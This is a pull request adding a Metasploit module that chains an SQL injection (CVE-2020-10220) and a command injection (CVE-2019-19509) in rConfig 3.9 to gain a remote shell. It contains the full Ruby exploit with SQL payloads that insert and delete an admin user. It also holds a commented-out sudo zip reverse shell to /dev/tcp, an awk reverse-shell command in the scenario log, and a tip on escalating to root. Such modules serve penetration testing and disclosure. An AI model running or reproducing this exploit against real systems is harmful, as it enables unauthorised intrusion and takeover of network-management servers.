### PR TITLE
Add module rConfig 3.9 RCE

### DIFF
--- a/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md
+++ b/documentation/modules/exploit/linux/http/rconfig_ajaxarchivefiles_rce.md
@@ -1,0 +1,77 @@
+## Vulnerable Application
+This module exploits multiple vulnerabilities in rConfig version 3.9 and prior in order to execute arbitrary commands.
+
+The module first add a temporary admin user to the application by exploiting an SQL injection (CVE-2020-10220).
+
+Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `path` parameter of the ajaxArchiveFiles functionality within the rConfig web interface (CVE-2019-19509).
+
+The module works with HTTP or HTTPS (both were tested) but the application does redirection via php code so SSL is enabled by default (and should be used). Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via SQLI. This module has been successfully tested on rConfig 3.9.2 and 3.9.4.
+
+Tips : once you get a shell, look at the CVE-2019-19585. You will probably get root because rConfig install script add Apache user to sudoers with nopasswd ;-)
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. `use exploit/linux/http/rconfig_ajaxarchivefiles_rce`
+4. `set RHOSTS target_ip`
+5. `set RPORT target_port`
+6. `set LHOST your_ip`
+7. `set LPORT your_port`
+8. `set verbose true`
+9. `exploit -j`
+
+## Scenarios
+```
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > show options
+
+Module options (exploit/linux/http/rconfig_ajaxarchivefiles_rce):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path to Rconfig
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (generic/shell_reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Auto
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set RHOSTS 1.1.1.1
+RHOSTS => 1.1.1.1
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > set LHOST 1.1.1.2
+LHOST => 1.1.1.2
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > 
+[+] rConfig version 3.9 detected
+[+] New temporary user 6QpO8mLt created
+[+] Authenticated as user 6QpO8mLt
+[*] Command shell session 1 opened (1.1.1.2:4444 -> 1.1.1.1:34586) at 2020-03-10 22:26:46 +0100
+[+] Command sucessfully executed
+[*] User 6QpO8mLt removed successfully !
+
+msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce) > sessions -i 1
+[*] Starting interaction with 1...
+id
+uid=48(apache) gid=48(apache) groups=48(apache)
+```
+## References
+1. <https://cvedetails.com/cve/CVE-2019-19509/>
+2. <https://cvedetails.com/cve/CVE-2020-10220/>
+3. <https://www.exploit-db.com/exploits/47982>
+4. <https://www.exploit-db.com/exploits/48208>
+5. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py>
+6. <https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py>

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -25,6 +25,9 @@ class MetasploitModule < Msf::Exploit::Remote
           3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
              execute the payload.
           4. Remove the added admin user.
+        Tips : once you get a shell, look at the CVE-2019-19585. 
+        You will probably get root because rConfig install script add Apache user to 
+        sudoers with nopasswd ;-)
       ',
                       'License'         => MSF_LICENSE,
                       'Author'          =>

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -29,7 +29,8 @@ class MetasploitModule < Msf::Exploit::Remote
                       'License'         => MSF_LICENSE,
                       'Author'          =>
         [
-          'Jean-Pascal Thomas' # @vikingfr - Discovery, exploit and Metasploit module
+          'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module
+          'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/)
         ],
                       'References'      =>
         [

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -25,8 +25,8 @@ class MetasploitModule < Msf::Exploit::Remote
           3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
              execute the payload.
           4. Remove the added admin user.
-        Tips : once you get a shell, look at the CVE-2019-19585. 
-        You will probably get root because rConfig install script add Apache user to 
+        Tips : once you get a shell, look at the CVE-2019-19585.
+        You will probably get root because rConfig install script add Apache user to
         sudoers with nopasswd ;-)
       ',
                       'License'         => MSF_LICENSE,

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         interface in order to execute the payload. 
         Valid credentials for a user with administrative privileges are required.
         However, this module can bypass authentication via SQLI.
-        This module has been successfully tested on Rconfig 3.9.4.
+        This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
 
         The steps are:
           1. SQLi on /commands.inc.php allow us to add an administrative user.

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
         in order to execute arbitrary commands.
         This module takes advantage of a command injection vulnerability in the
         `path` parameter of the ajax archive file functionality within the rConfig web
-        interface in order to execute the payload. 
+        interface in order to execute the payload.
         Valid credentials for a user with administrative privileges are required.
         However, this module can bypass authentication via SQLI.
         This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # get session cookie (PHPSESSID)
     res = send_request_cgi!({
       'method' => 'GET',
-      'uri'    => '/login.php' 
+      'uri'    => '/login.php'
     })
     @cookie = res.get_cookies
     if @cookie.empty?

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if !res || !res.get_html_document
       fail_with(Failure::Unknown, 'Could not check rConfig version')
     end
-    if res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig Version 3\.9/
+    if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
       print_status("rConfig version 3.9 detected")
       return Exploit::CheckCode::Appears
     elsif res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig/

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
     if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
       print_status("rConfig version 3.9 detected")
       return Exploit::CheckCode::Appears
-    elsif res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig/
+    elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
       print_status("rConfig detected, but not version 3.9")
       return Exploit::CheckCode::Detected
     end

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -1,0 +1,199 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name'            => 'Rconfig 3.x Chained Remote Code Execution',
+      'Description'     => %q{
+        This module exploits multiple vulnerabilities in rConfig version 3.9
+        in order to execute arbitrary commands.
+        This module takes advantage of a command injection vulnerability in the
+        `path` parameter of the ajax archive file functionality within the rConfig web
+        interface in order to execute the payload. 
+        Valid credentials for a user with administrative privileges are required.
+        However, this module can bypass authentication via SQLI.
+        This module has been successfully tested on Rconfig 3.9.4.
+
+        The steps are:
+          1. SQLi on /commands.inc.php allow us to add an administrative user.
+          2. An authenticated session is established with the newly added user
+          3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
+             execute the payload.
+          4. Remove the added admin user.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Jean-Pascal Thomas' # @vikingfr - Discovery, exploit and Metasploit module
+        ],
+      'References'      =>
+        [
+          ['CVE', '2019-19509'], # authenticated rce
+          ['CVE', '2020-10220'], # sqli auth bypass
+          ['EDB', '47982'],
+          ['URL','https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
+          ['URL','https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py']  # unauthenticated SQLi
+        ],
+      'Platform'        => %w[unix linux],
+      'Arch'            => ARCH_CMD,
+      'Targets'         => [['Auto', { }]],
+      'Privileged'      => true,
+      'DisclosureDate'  => '2020-03-11',
+      'DefaultOptions'  => {
+        'RPORT' => 443,
+        'SSL'     => true, #HTTPS is required for the module to work because the rConfig php code handle http to https redirects
+        'PAYLOAD' => 'generic/shell_reverse_tcp'
+        },
+      'DefaultTarget'   => 0))
+    register_options [
+      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']),
+    ]
+  end
+
+# CHECK IF RCONFIG IS REACHABLE AND INSTALLED
+  def check
+    vprint_status "STEP 0: Get rConfig version..."
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri'    => '/login.php'
+    })
+    if !res || !res.get_html_document
+      fail_with(Failure::Unknown, 'Could not check rConfig version')
+    end
+    if res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig Version 3\.9/
+      print_status("rConfig version 3.9 detected")
+      return Exploit::CheckCode::Appears
+    elsif res.get_html_document.at('div[@id="footer-copyright"]').text =~ /rConfig/
+      print_status("rConfig detected, but not version 3.9")
+      return Exploit::CheckCode::Detected
+    end
+  end
+
+# CREATE AN ADMIN USER IN RCONFIG
+  def create_rconfig_user(user, password)
+    vprint_status "STEP 1 : Adding a temporary admin user..."
+    fake_id = Rex::Text.rand_text_numeric(3)
+    fake_pass = Rex::Text::rand_text_alpha(10)
+    fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
+    fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
+    userleveladmin = 9 # Administrator
+    user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--"
+    sqli_res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, "/commands.inc.php"),
+      'method'    => 'GET',
+      'vars_get' => {
+        'search'       => 'search',
+        'searchOption' => 'contains',
+        'searchField'  => 'vuln',
+        'searchColumn' => user_sqli
+     }
+    })
+    unless sqli_res
+      print_warning("Failed to create user: Connection failed.")
+      return
+    end
+    print_good "New temporary user #{user} created"
+  end
+
+# AUTHENTICATE ON RCONFIG
+  def login(user, pass)
+    vprint_status "STEP 2: Authenticating as #{user} ..."
+    # get session cookie (PHPSESSID)
+    res = send_request_cgi!({
+      'method' => 'GET',
+      'uri'    => '/login.php' 
+    })
+    @cookie = res.get_cookies
+    if @cookie.empty?
+      fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
+      return
+    end
+    # authenticate
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+      'cookie' => @cookie,
+      'vars_post' => {
+        pass: pass,
+        user: user,
+        sublogin: 1
+      }
+    })
+    unless res
+      print_warning("Failed to authenticate: Connection failed.")
+      return
+    end
+    print_good "Authenticated as user #{user}"
+  end
+
+  def trigger_rce(cmd, opts = {})
+    vprint_status "STEP 3: Executing the command (#{cmd})"
+    trigger = "`#{cmd} #`"
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),
+      'cookie' => @cookie,
+      'vars_get' => {
+        'path' => trigger,
+        'ext'  => 'random'
+      }
+    })
+    # the page hangs because of the command being executed, so we can't expect HTTP response
+    #unless res
+    #  fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'
+    #  return
+    #end
+    #unless res.body.include? '"success":true'
+    #  fail_with Failure::Unknown, 'It seems that the code was not executed'
+    #  return
+    #end
+    print_good "Command sucessfully executed"
+  end
+
+# DELETE A USER
+  def delete_rconfig_user(user)
+    vprint_status "STEP 4 : Removing the temporary admin user..."
+    del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--"
+    del_res = send_request_cgi({
+      'uri'       => normalize_uri(target_uri.path, "/commands.inc.php"),
+      'method'    => 'GET',
+       'vars_get' => {
+        'search'       => 'search',
+        'searchOption' => 'contains',
+        'searchField'  => 'vuln',
+        'searchColumn' => del_sqli
+     }
+    })
+    unless del_res
+      print_warning "Removing user #{user} failed: Connection failed. Please remove it manually."
+      return
+    end
+    print_status "User #{user} removed successfully !"
+  end
+
+  def cleanup
+    super
+    if @username
+      delete_rconfig_user @username
+    end
+  end
+
+  def exploit
+    check
+    @username = rand_text_alphanumeric(8..12)
+    @password = 'admin'
+    create_res = create_rconfig_user @username, @password
+    login(@username,@password)
+    tmp_txt_file = Rex::Text::rand_text_alpha(10)
+    tmp_zip_file = Rex::Text::rand_text_alpha(10)
+    # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(
+    # trigger_rce("touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'")
+    trigger_rce("#{payload.encoded}")
+  end
+end

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote
         However, this module can bypass authentication via SQLI.
         This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
         The steps are:
-          1. SQLi on /commands.inc.php allow us to add an administrative user.
+          1. SQLi on /commands.inc.php allows us to add an administrative user.
           2. An authenticated session is established with the newly added user
           3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
              execute the payload.
@@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote
                       'Platform'        => %w[unix linux],
                       'Arch'            => ARCH_CMD,
                       'Targets'         => [['Auto', {}]],
-                      'Privileged'      => true,
+                      'Privileged'      => false,
                       'DisclosureDate'  => '2020-03-11',
                       'DefaultOptions'  => {
                         'RPORT' => 443,
@@ -68,7 +68,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Could not check rConfig version')
     end
     if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
-      print_status('rConfig version 3.9 detected')
+      print_good('rConfig version 3.9 detected')
       return Exploit::CheckCode::Appears
     elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
       print_status('rConfig detected, but not version 3.9')

--- a/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
+++ b/modules/exploits/linux/http/rconfig_ajaxarchivefiles_rce.rb
@@ -9,8 +9,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-                      'Name'            => 'Rconfig 3.x Chained Remote Code Execution',
-      'Description'     => %q{
+                      'Name' => 'Rconfig 3.x Chained Remote Code Execution',
+                      'Description' => '
         This module exploits multiple vulnerabilities in rConfig version 3.9
         in order to execute arbitrary commands.
         This module takes advantage of a command injection vulnerability in the
@@ -19,157 +19,157 @@ class MetasploitModule < Msf::Exploit::Remote
         Valid credentials for a user with administrative privileges are required.
         However, this module can bypass authentication via SQLI.
         This module has been successfully tested on Rconfig 3.9.3 and 3.9.4.
-
         The steps are:
           1. SQLi on /commands.inc.php allow us to add an administrative user.
           2. An authenticated session is established with the newly added user
           3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to
              execute the payload.
           4. Remove the added admin user.
-      },
-      'License'         => MSF_LICENSE,
-      'Author'          =>
+      ',
+                      'License'         => MSF_LICENSE,
+                      'Author'          =>
         [
           'Jean-Pascal Thomas' # @vikingfr - Discovery, exploit and Metasploit module
         ],
-      'References'      =>
+                      'References'      =>
         [
           ['CVE', '2019-19509'], # authenticated rce
           ['CVE', '2020-10220'], # sqli auth bypass
-          ['EDB', '47982'],
-          ['URL','https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
-          ['URL','https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py']  # unauthenticated SQLi
+          %w[EDB 47982],
+          %w[EDB 48208],
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE
+          ['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py']  # unauthenticated SQLi
         ],
-      'Platform'        => %w[unix linux],
-      'Arch'            => ARCH_CMD,
-      'Targets'         => [['Auto', { }]],
-      'Privileged'      => true,
-      'DisclosureDate'  => '2020-03-11',
-      'DefaultOptions'  => {
-        'RPORT' => 443,
-        'SSL'     => true, #HTTPS is required for the module to work because the rConfig php code handle http to https redirects
-        'PAYLOAD' => 'generic/shell_reverse_tcp'
-        },
-      'DefaultTarget'   => 0))
+                      'Platform'        => %w[unix linux],
+                      'Arch'            => ARCH_CMD,
+                      'Targets'         => [['Auto', {}]],
+                      'Privileged'      => true,
+                      'DisclosureDate'  => '2020-03-11',
+                      'DefaultOptions'  => {
+                        'RPORT' => 443,
+                        'SSL'     => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects
+                        'PAYLOAD' => 'generic/shell_reverse_tcp'
+                      },
+                      'DefaultTarget' => 0))
     register_options [
-      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']),
+      OptString.new('TARGETURI', [true, 'Base path to Rconfig', '/'])
     ]
   end
 
-# CHECK IF RCONFIG IS REACHABLE AND INSTALLED
+  # CHECK IF RCONFIG IS REACHABLE AND INSTALLED
   def check
-    vprint_status "STEP 0: Get rConfig version..."
-    res = send_request_cgi!({
+    vprint_status 'STEP 0: Get rConfig version...'
+    res = send_request_cgi!(
       'method' => 'GET',
-      'uri'    => '/login.php'
-    })
+      'uri' => '/login.php'
+    )
     if !res || !res.get_html_document
       fail_with(Failure::Unknown, 'Could not check rConfig version')
     end
     if res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig Version 3.9'
-      print_status("rConfig version 3.9 detected")
+      print_status('rConfig version 3.9 detected')
       return Exploit::CheckCode::Appears
     elsif res.get_html_document.at('div[@id="footer-copyright"]').text.include? 'rConfig'
-      print_status("rConfig detected, but not version 3.9")
+      print_status('rConfig detected, but not version 3.9')
       return Exploit::CheckCode::Detected
     end
   end
 
-# CREATE AN ADMIN USER IN RCONFIG
-  def create_rconfig_user(user, password)
-    vprint_status "STEP 1 : Adding a temporary admin user..."
+  # CREATE AN ADMIN USER IN RCONFIG
+  def create_rconfig_user(user, _password)
+    vprint_status 'STEP 1 : Adding a temporary admin user...'
     fake_id = Rex::Text.rand_text_numeric(3)
-    fake_pass = Rex::Text::rand_text_alpha(10)
-    fake_pass_md5 = "21232f297a57a5a743894a0e4a801fc3" # hash of 'admin'
-    fake_userid_md5 = "6c97424dc92f14ae78f8cc13cd08308d"
+    fake_pass = Rex::Text.rand_text_alpha(10)
+    fake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin'
+    fake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d'
     userleveladmin = 9 # Administrator
     user_sqli = "command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--"
-    sqli_res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, "/commands.inc.php"),
-      'method'    => 'GET',
+    sqli_res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
+      'method' => 'GET',
       'vars_get' => {
-        'search'       => 'search',
+        'search' => 'search',
         'searchOption' => 'contains',
         'searchField'  => 'vuln',
         'searchColumn' => user_sqli
-     }
-    })
+      }
+    )
     unless sqli_res
-      print_warning("Failed to create user: Connection failed.")
+      print_warning('Failed to create user: Connection failed.')
       return
     end
     print_good "New temporary user #{user} created"
   end
 
-# AUTHENTICATE ON RCONFIG
+  # AUTHENTICATE ON RCONFIG
   def login(user, pass)
     vprint_status "STEP 2: Authenticating as #{user} ..."
     # get session cookie (PHPSESSID)
-    res = send_request_cgi!({
+    res = send_request_cgi!(
       'method' => 'GET',
-      'uri'    => '/login.php'
-    })
+      'uri' => '/login.php'
+    )
     @cookie = res.get_cookies
     if @cookie.empty?
       fail_with Failure::UnexpectedReply, 'Failed to retrieve cookies'
       return
     end
     # authenticate
-    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
       'cookie' => @cookie,
       'vars_post' => {
         pass: pass,
         user: user,
         sublogin: 1
       }
-    })
+    )
     unless res
-      print_warning("Failed to authenticate: Connection failed.")
+      print_warning('Failed to authenticate: Connection failed.')
       return
     end
     print_good "Authenticated as user #{user}"
   end
 
-  def trigger_rce(cmd, opts = {})
+  def trigger_rce(cmd, _opts = {})
     vprint_status "STEP 3: Executing the command (#{cmd})"
     trigger = "`#{cmd} #`"
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
       'uri'    => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'),
       'cookie' => @cookie,
       'vars_get' => {
         'path' => trigger,
-        'ext'  => 'random'
+        'ext' => 'random'
       }
-    })
+    )
     # the page hangs because of the command being executed, so we can't expect HTTP response
-    #unless res
+    # unless res
     #  fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed'
     #  return
-    #end
-    #unless res.body.include? '"success":true'
+    # end
+    # unless res.body.include? '"success":true'
     #  fail_with Failure::Unknown, 'It seems that the code was not executed'
     #  return
-    #end
-    print_good "Command sucessfully executed"
+    # end
+    print_good 'Command sucessfully executed'
   end
 
-# DELETE A USER
+  # DELETE A USER
   def delete_rconfig_user(user)
-    vprint_status "STEP 4 : Removing the temporary admin user..."
+    vprint_status 'STEP 4 : Removing the temporary admin user...'
     del_sqli = "command ; DELETE FROM `users` WHERE `username`='#{user}';--"
-    del_res = send_request_cgi({
-      'uri'       => normalize_uri(target_uri.path, "/commands.inc.php"),
-      'method'    => 'GET',
-       'vars_get' => {
-        'search'       => 'search',
+    del_res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/commands.inc.php'),
+      'method' => 'GET',
+      'vars_get' => {
+        'search' => 'search',
         'searchOption' => 'contains',
         'searchField'  => 'vuln',
         'searchColumn' => del_sqli
-     }
-    })
+      }
+    )
     unless del_res
       print_warning "Removing user #{user} failed: Connection failed. Please remove it manually."
       return
@@ -179,9 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def cleanup
     super
-    if @username
-      delete_rconfig_user @username
-    end
+    delete_rconfig_user @username if @username
   end
 
   def exploit
@@ -189,11 +187,11 @@ class MetasploitModule < Msf::Exploit::Remote
     @username = rand_text_alphanumeric(8..12)
     @password = 'admin'
     create_res = create_rconfig_user @username, @password
-    login(@username,@password)
-    tmp_txt_file = Rex::Text::rand_text_alpha(10)
-    tmp_zip_file = Rex::Text::rand_text_alpha(10)
+    login(@username, @password)
+    tmp_txt_file = Rex::Text.rand_text_alpha(10)
+    tmp_zip_file = Rex::Text.rand_text_alpha(10)
     # The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-(
     # trigger_rce("touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'")
-    trigger_rce("#{payload.encoded}")
+    trigger_rce(payload.encoded.to_s)
   end
 end


### PR DESCRIPTION
Add rConfig exploit (chained CVE-2020-10220 + CVE-2019-19509).
```
CVE-2019-19509 :
An issue was discovered in rConfig 3.9.3. A remote authenticated user can directly execute system commands by sending a GET request to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering, which can lead to command execution.

CVE-2020-10220 :
An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.
```
Exploits walkthrough: 
https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py
https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py

### Verification

List the steps needed to make sure this thing works
```
Start msfconsole
use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final
set RHOSTS target_ip
set RPORT target_port
set LHOST your_ip
set LPORT your_port
set verbose true
exploit -j
```

### Scenario
```
resource (rconfig_final.rc)> use exploit/linux/http/rconfig_ajaxarchivefiles_rce_final
resource (rconfig_final.rc)> set RHOSTS 1.1.1.1
resource (rconfig_final.rc)> set RPORT 443
resource (rconfig_final.rc)> set LHOST 1.1.1.2
resource (rconfig_final.rc)> set LPORT 3333
resource (rconfig_final.rc)> set verbose true
resource (rconfig_final.rc)> exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 1.1.1.2:3333 
msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > 
[*] STEP 0: Get rConfig version...
[*] rConfig version 3.9 detected
[*] STEP 1 : Adding a temporary admin user...
[+] New temporary user ElCWcNJhUId created
[*] STEP 2: Authenticating as ElCWcNJhUId ...
[+] Authenticated as user ElCWcNJhUId
[*] STEP 3: Executing the command (awk 'BEGIN{s="/inet/tcp/0/1.1.1.2/3333";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}')
[*] Command shell session 1 opened (1.1.1.2:3333 -> 1.1.1.1:39076) at 2020-03-10 15:50:44 +0100
[+] Command sucessfully executed
[*] STEP 4 : Removing the temporary admin user...
[*] User ElCWcNJhUId removed successfully !

msf5 exploit(linux/http/rconfig_ajaxarchivefiles_rce_final) > sessions -i 1
[*] Starting interaction with 1...

id
uid=48(apache) gid=48(apache) groups=48(apache)
```
